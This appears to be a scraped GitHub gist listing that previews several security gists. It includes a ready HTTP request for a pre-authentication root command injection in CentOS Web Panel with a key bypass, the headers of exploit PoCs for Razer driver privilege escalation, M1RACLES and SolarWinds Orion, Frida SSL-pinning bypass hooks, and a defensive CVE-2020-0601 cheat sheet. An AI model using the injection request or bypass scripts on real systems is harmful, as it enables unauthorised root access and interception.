numan türle numanturle

@divinepwner
divinepwner / cwp.md
Created Aug 26, 2021
cwp pre-auth command inj BUT ULTRA RARE case.

This is a very very rare case on CentOS Web Panel. Key value should be set on target CentOS Web Panel. When key value has been set on target, this can be bypassed with ".?" and without key value, commands can be executed on target system via root level privileges.

command injection on username parameter.

GET /admin/index.php?api=test&key=.?&action=xml&username=root;[command_here]%0A HTTP/1.1
Host: target:2087
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
@tothi
tothi / usbgadget_razer.sh
Created Aug 22, 2021
Razer USB gadget on Android for Local Privilege Escalation on Windows
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID
# devices for triggering the vulnerable Windows Driver installer
# credits for the Windows Driver install vuln: @j0nh4t
#
# https://twitter.com/j0nh4t/status/1429049506021138437
# https://twitter.com/an0n_r0/status/1429263450748895236
#
# the script was developed & tested on Android LineageOS 18.1
m1racles-poc.c
/*
* m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1.
*
* This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register.
*
* Please visit m1racles.com for more information.
*
* Licensed under the MIT license.
*/
@0xsha
0xsha / Solarwinds_Orion_LFD.py
Last active Oct 21, 2021
Solarwinds_Orion_LFD local file disclosure PoC for SolarWinds Orion aka door to SuperNova?)
# CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? )
# @0xSha
# (C) 2020 0xSha.io
# Advisory : https://www.solarwinds.com/securityadvisory
# Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip
# Details : https://kb.cert.org/vuls/id/843464
# C:\inetpub\SolarWinds\bin\OrionWeb.DLL
# According to SolarWinds.Orion.Web.HttpModules
@antichown
antichown / Golang cross compilation
Last active Nov 7, 2020
Golang cross compilation
#!/bin/bash
# Reference:
# https://github.com/golang/go/blob/master/src/go/build/syslist.go
os_archs=(
aix/ppc64
darwin/386
darwin/amd64
dragonfly/amd64
freebsd/386
@IvanChepurnyi
IvanChepurnyi / JIT results
Last active Apr 29, 2021
Benchmark HTTP service
wrk -c 500 -d 30s -t 12 -R 20k -L http://localhost:8888
Running 30s test @ http://localhost:8888
12 threads and 500 connections
Thread calibration: mean lat.: 456.139ms, rate sampling interval: 3485ms
Thread calibration: mean lat.: 458.787ms, rate sampling interval: 3125ms
Thread calibration: mean lat.: 294.161ms, rate sampling interval: 1654ms
Thread calibration: mean lat.: 391.126ms, rate sampling interval: 3123ms
Thread calibration: mean lat.: 325.404ms, rate sampling interval: 2699ms
Thread calibration: mean lat.: 359.069ms, rate sampling interval: 2533ms
Thread calibration: mean lat.: 72.867ms, rate sampling interval: 222ms
@eybisi
eybisi / hooky.js
Created Apr 18, 2020
hookymooky.js
// install package with adb install package.name
// do not open application
// use -f force option
// frida -U -f package.name -l del.js
Java.perform(function() {
var ssl = Java.use("k.x$b")
var channel = Java.use("f.e.c.b.g.f.g.a.c")
var Integer = Java.use("java.lang.Integer");
var ArrayList = Java.use("java.util.ArrayList");
var ArrayList = Java.use("java.util.ArrayList");
gd-gif.php
<?php
//php gd-gif.php image.gif gd-image.gif
$gif = imagecreatefromgif($argv[1]);
imagegif($gif, $argv[2]);
imagedestroy($gif);
?>
@SwitHak
SwitHak / 20200114-TLP-WHITE_CVE-2020-0601.md
Last active May 24, 2021
BlueTeam CheatSheet * CVE-2020-0601 * crypt32.dll | Last updated: 2020-01-21 1817 UTC

CVE-2020-0601 AKA ChainOfFools OR CurveBall

General

  • Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
  • The vulnerability was discovered by the U.S. National Security Agency, announced today (2020-01-14) in their press conference, followed by a blog post and an official security advisory.
  • The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.

Vulnerability explanation

  • NSA description:
  • NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.
@akabe1
akabe1 / frida_multiple_unpinning.js
Last active Oct 21, 2021
Another Android ssl certificate pinning bypass for various methods
/* Android ssl certificate pinning bypass script for various methods
by Maurizio Siddu
Run with:
frida -U -f [APP_ID] -l frida_multiple_unpinning.js --no-pause
*/
setTimeout(function() {
Java.perform(function () {
console.log('');